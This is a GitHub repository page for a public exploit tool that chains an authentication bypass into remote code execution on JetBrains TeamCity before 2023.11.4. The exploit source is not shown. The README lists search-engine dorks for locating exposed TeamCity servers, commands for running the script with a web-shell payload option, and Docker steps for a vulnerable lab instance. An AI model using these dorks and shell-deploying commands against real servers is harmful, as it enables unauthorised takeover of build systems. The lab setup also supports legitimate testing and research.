Skip to content
/ CVE-2024-27198-RCE Public

CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity Pre-2023.11.4

143 stars 36 forks Branches Tags Activity
Star
Notifications You must be signed in to change notification settings

W01fh4cker/CVE-2024-27198-RCE

BranchesTags

Folders and files

NameName
Last commit message
Last commit date

Latest commit

 

History

11 Commits
CVE-2024-27198-RCE.py
CVE-2024-27198-RCE.py
 
 
README.md
README.md
 
 

Repository files navigation

Cyberspace Mapping Dork

Fofa

app="JET_BRAINS-TeamCity"

ZoomEye

app:"JetBrains TeamCity"

Hunter.how

product.name="TeamCity"

Shodan

http.component:"teamcity"

How to use

I'm using Python3.9.

pip install requests urllib3 faker
python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 --behinder4
# python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111 -f shell.jsp

also:

python CVE-2024-27198-RCE.py -t http://192.168.198.173:8111

Vulnerability recurrence environment construction

Use docker to pull the vulnerable image and start it:

sudo docker pull jetbrains/teamcity-server:2023.11.3
sudo docker run -it -d --name teamcity -u root -p 8111:8111 jetbrains/teamcity-server:2023.11.3
# sudo ufw disable

Then make basic settings:

Reference

https://www.rapid7.com/blog/post/2024/03/04/etr-cve-2024-27198-and-cve-2024-27199-jetbrains-teamcity-multiple-authentication-bypass-vulnerabilities-fixed/

https://github.com/Chocapikk/CVE-2024-27198

About

CVE-2024-27198 & CVE-2024-27199 Authentication Bypass --> RCE in JetBrains TeamCity Pre-2023.11.4

Topics

exploit jetbrains auth rce teamcity 0day redteam cve-2024-27198 cve-2024-27199

Resources

Readme
Activity

Stars

143 stars

Watchers

3 watching

Forks

36 forks
Report repository

Releases

No releases published

Packages

No packages published

Languages